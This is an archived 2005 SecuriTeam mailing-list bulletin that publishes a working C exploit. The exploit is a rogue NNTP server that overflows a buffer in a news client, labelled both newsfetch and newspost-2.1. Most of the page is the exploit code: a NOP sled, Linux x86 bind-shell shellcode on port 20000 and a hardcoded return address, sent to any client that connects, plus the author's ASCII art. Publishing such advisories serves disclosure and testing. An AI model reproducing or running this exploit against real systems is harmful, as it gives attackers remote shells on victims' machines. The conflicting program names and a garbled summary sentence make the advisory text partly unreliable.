[EXPL] newsfetch Buffer Overflow Exploit
From: SecuriTeam (support_at_securiteam.com)
Date: 02/03/05
- Previous message: SecuriTeam: "[NT] DeskNow Mail and Collaboration Server Directory Traversal Vulnerabilities"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
To: list@securiteam.com Date: 3 Feb 2005 18:27:22 +0200
The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion
The SecuriTeam alerts list - Free, Accurate, Independent.
Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html
- - - - - - - - -
newsfetch Buffer Overflow Exploit
------------------------------------------------------------------------
SUMMARY
<http://www.securiteam.com/unixfocus/5RP050KEUK.html> newsfetch is "a
powerfull utility to fetch news from an NNTP server and stores in the
mailbox format. The files created by newsfetch can be used with any mail
reader".
Due to poor handling of provided that an attacker can cause newsfetch to
overflow an internal buffer. The following exploit code can be used to
test your system for the mentioned vulnerability.
DETAILS
Exploit:
/*
02/03/2005
NOTES: -Newspost "socket_getline()" Buffer Overflow Exploit
Client Usage
------------
cybertronic:~/newspost-2.1> ./newspost -i <IP> -n cyber -s tronic <file>
Greetz fly to my girlfriend YASMIN H.
?
?M
M ?MMM
MMm ?MMMM
M$$MMm ?MMMMM.
MM$$MMMMm MMMMMMMM
`MM$$MMMMMMm 4MMMM$$MM
MMM$$MMMMMMMMm ?MMMM$$MMM
MMM$$$MMMMMMMMm mMMMM$MMMM
`MMM$$$MMMMMMMm MMMM$MMMM?
MMMM$$$MMMMMMMm MMM$$MMM?
`MMMMMMMMMMMMMm MMMMMMM?
`MMMMMMMMMMMMMm MMMMMM
`MMMMMMMMMMMM MMMMM
`MMMMMMMMMM MMMMM
`MMMMMMMMMMMM
MMMMMMMMMMM
mmMMMMMMMMMMMMMMMMM
mmMMMMMMMMMMMMMMMMMMMMMM
?MMM#MMMMMMMMMMMMMMMMMMMMm
4MMM< >MMMMMMMMMMMMMMMMMMMM
MMMMMm_ mMMMMMMMMMMMMMMMMMMMM
4MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMMMMMMMMMM
?Mn ?MMMMMMMMMMMMMMMMMMMMMMMMM ?Mnn
nM `MMMMMMMMMMMMMMMMMMMMMM? n?
`? MMMMMMMMMMMMMMMMM? n?
MMMMMM?
mtr?
mMMM nmM mM
mM?? M ' M n
mM$ nM n?MMn?
4M m ?M N ?
?`
m? `n? mM NM? NM
mM mMm nm M??M ? n?Mm ?n xn , ? ?n xn ?Mm Mn n?
nM
nMm
mM `mMM? nM M nM ,` ?n? y M ?n? y nM ? nM
?
M? M' ? M n.,? nm nM nM n M ?
? n
MM? mM M nM M? n , nM ? nM M nM M M
M? M
n
MMM? M? nM M M n?nN ?M nM ?M `?M? ?? .N
nM
?nM?
M?
n? cybertronic 2oo5
? ________________
----------------------/
MMMMMMMMm mMMMMMMM?
?MM$MMMMMMMMMm mMMMMMMMMM$MM`
MMMMMMMMMMMMMMMm mMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMM
MMMMMMMMMMMMMMMMMMMM MMMMMMMMMMMMMMMMMMMM
`MMMMMMMMMMMMMMMMMM MMMMMMMMMMM(c)MMMM?
just want to say love you dad!
*/
#include <stdio.h>
#include <strings.h>
#include <signal.h>
#include <netinet/in.h>
#include <netdb.h>
#define RED "\E[31m\E[1m"
#define GREEN "\E[32m\E[1m"
#define YELLOW "\E[33m\E[1m"
#define BLUE "\E[34m\E[1m"
#define NORMAL "\E[m"
#define PORT 119
#define BACKLOG 5
//92 bytes bindcode port 20000
char scode[] =
"\x31\xdb" // xor ebx, ebx
"\xf7\xe3" // mul ebx
"\xb0\x66" // mov al, 102
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x43" // inc ebx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\x4b" // dec ebx
"\xcd\x80" // int 80h
"\x89\xc7" // mov edi, eax
"\x52" // push edx
"\x66\x68\x4e\x20" // push word 8270
"\x43" // inc ebx
"\x66\x53" // push bx
"\x89\xe1" // mov ecx, esp
"\xb0\xef" // mov al, 239
"\xf6\xd0" // not al
"\x50" // push eax
"\x51" // push ecx
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\xb0\x66" // mov al, 102
"\x43" // inc ebx
"\x43" // inc ebx
"\xcd\x80" // int 80h
"\x50" // push eax
"\x50" // push eax
"\x57" // push edi
"\x89\xe1" // mov ecx, esp
"\x43" // inc ebx
"\xb0\x66" // mov al, 102
"\xcd\x80" // int 80h
"\x89\xd9" // mov ecx, ebx
"\x89\xc3" // mov ebx, eax
"\xb0\x3f" // mov al, 63
"\x49" // dec ecx
"\xcd\x80" // int 80h
"\x41" // inc ecx
"\xe2\xf8" // loop lp
"\x51" // push ecx
"\x68\x6e\x2f\x73\x68" // push dword 68732f6eh
"\x68\x2f\x2f\x62\x69" // push dword 69622f2fh
"\x89\xe3" // mov ebx, esp
"\x51" // push ecx
"\x53" // push ebx
"\x89\xe1" // mov ecx, esp
"\xb0\xf4" // mov al, 244
"\xf6\xd0" // not al
"\xcd\x80"; // int 80h
void cmd ( int connfd );
void header ();
int
main ( int argc, char* argv[] )
{
int listenfd, connfd;
pid_t childpid;
socklen_t clilen;
struct sockaddr_in cliaddr, servaddr;
header ();
printf ( "[*] Creating socket..." );
if ( ( listenfd = socket ( AF_INET, SOCK_STREAM, 0 ) ) == -1 )
{
printf ( RED "FAILED!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL );
bzero ( &servaddr, sizeof ( servaddr ) );
servaddr.sin_family = AF_INET;
servaddr.sin_addr.s_addr = htonl ( INADDR_ANY );
servaddr.sin_port = htons ( PORT );
bind ( listenfd, ( struct sockaddr * ) &servaddr, sizeof (
servaddr ) );
printf ( "[*] Listening..." );
if ( listen ( listenfd, BACKLOG ) == -1 )
{
printf ( RED "FAILED!\n" NORMAL );
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL );
for ( ; ; )
{
clilen = sizeof ( cliaddr );
if ( ( connfd = accept ( listenfd, ( struct sockaddr * )
&cliaddr,
&clilen ) ) < 0 )
{
close ( listenfd );
exit ( 1 );
}
if ( ( childpid = fork ( ) ) == 0 )
{
close ( listenfd );
printf ( "[*]" GREEN " Incomming connection
from:\t %s\n"
NORMAL, inet_ntoa ( cliaddr.sin_addr ) );
cmd ( connfd );
}
close ( connfd );
}
}
void
cmd ( int s )
{
char in[1024], out[1200];
unsigned long ret = 0xbfffecb8;
bzero ( &out, 1200 );
memset ( out, 0x90, 956 ); //956
memcpy ( out + 956, scode, sizeof ( scode ) );
strcat ( out, "\x41\x41\x41\x41" );
strncat ( out, ( unsigned char* ) &ret, 4 );
printf ( "[*] Sending Bad Packet [ %u bytes ]...", strlen ( out )
);
if ( write ( s, out, strlen ( out ) ) <= 0 )
{
printf ( RED "FAILED!\n" NORMAL);
exit ( 1 );
}
printf ( GREEN "OK!\n" NORMAL);
sleep ( 1 );
}
void
header ()
{
system ( "clear" );
printf ( RED "### " GREEN "# # " YELLOW "### " BLUE "### " RED
"### "
GREEN "### " YELLOW "### " BLUE "### " RED "# # " GREEN "# " YELLOW
"###\n"
NORMAL);
printf ( RED "# " GREEN "# # " YELLOW "# # " BLUE "# " RED "#
# "
GREEN " # " YELLOW "# # " BLUE "# # " RED "## # " GREEN "# " YELLOW "#
\n"
NORMAL);
printf ( RED "# " GREEN "# # " YELLOW "### " BLUE "### " RED
"### "
GREEN " # " YELLOW "### " BLUE "# # " RED "# # # " GREEN "# " YELLOW "#
\n"
NORMAL);
printf ( RED "# " GREEN " # " YELLOW "# # " BLUE "# " RED "#
# "
GREEN " # " YELLOW "# # " BLUE "# # " RED "# ## " GREEN "# " YELLOW "#
\n"
NORMAL);
printf ( RED "### " GREEN " # " YELLOW "### " BLUE "### " RED "#
# "
GREEN " # " YELLOW "# # " BLUE "### " RED "# # " GREEN "# " YELLOW
"###\n"
NORMAL);
printf ( RED " cybertronic@gmx.net\n" NORMAL );
printf ( RED " ----------(c) 2005----------\n\n"
NORMAL );
printf ( "newspost-2.1\n\n" );
}
ADDITIONAL INFORMATION
The information has been provided by <mailto:cybertronic@gmx.net> cyber
tronic.
========================================
This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@securiteam.com
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@securiteam.com
====================
====================
DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.
- Previous message: SecuriTeam: "[NT] DeskNow Mail and Collaboration Server Directory Traversal Vulnerabilities"
- Messages sorted by: [ date ] [ thread ] [ subject ] [ author ] [ attachment ]
Relevant Pages
- [UNIX] Cfengine Remotely Exploitable Buffer Overflow (net.c)
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... cfservd daemon in Cfengine
2.x prior to version 2.0.8. ... unsigned int len = 0; ... void getshell;
... (Securiteam) - [EXPL] pServ User-Agent Buffer Overflow
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... User-Agent data handling allows
remote attackers to cause pServ to execute ... int op_plat_num; ... void
getshell; ... (Securiteam) - [NEWS] Festalon Heap Corruption
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... void fwbof(FILE *fd, int
len, int chr); ... void fwi08(FILE *fd, int num) { ... (Securiteam) - [UNIX] Linux Kernel uselib() Privilege Elevation
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... static int load_elf_library
... Obviously, if the kmem_cache_alloccall sleeps, the newly created VMA ... void
fatal ... (Securiteam) - [EXPL] EPIC4 CTCP Nicknames Buffer Overflow
... The following security advisory is sent to the securiteam mailing list, and can be
found at the SecuriTeam web site: http://www.securiteam.com ... void send_mes(int fd,char *host);
... void wait_connection; ... unsigned int check_version = 0; ...
(Securiteam)
